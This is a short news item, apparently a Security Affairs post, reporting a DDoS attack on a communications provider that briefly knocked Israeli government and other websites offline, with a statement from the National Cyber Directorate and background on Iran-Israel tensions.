At the time of this writing, some of the impacted websites are still unreachable.

The defense establishment and the National Cyber Directorate have declared a state of emergency and are currently working to determine whether the attack has caused damage to Israeli critical infrastructure.

“In the past few hours, a denial of service attack against a communications provider was identified. As a result, access to a number of websites, among them government websites, was blocked for a short time. As of now, all of the websites are operational,” said the National Cyber Directorate.

The attack against Israeli networks comes after Iranian state TV announced that Iran had thwarted an attack on the nuclear plant in Fordow.

Tension between Iran and Israel is very high; Teheran has previously accused Israel of orchestrating massive and disruptive attacks against its critical infrastructure.



Pierluigi Paganini

(SecurityAffairs – hacking, Israel)

The post A massive DDoS attack hit Israel, government sites went offline appeared first on Security Affairs.

Categories: Cyber Security News
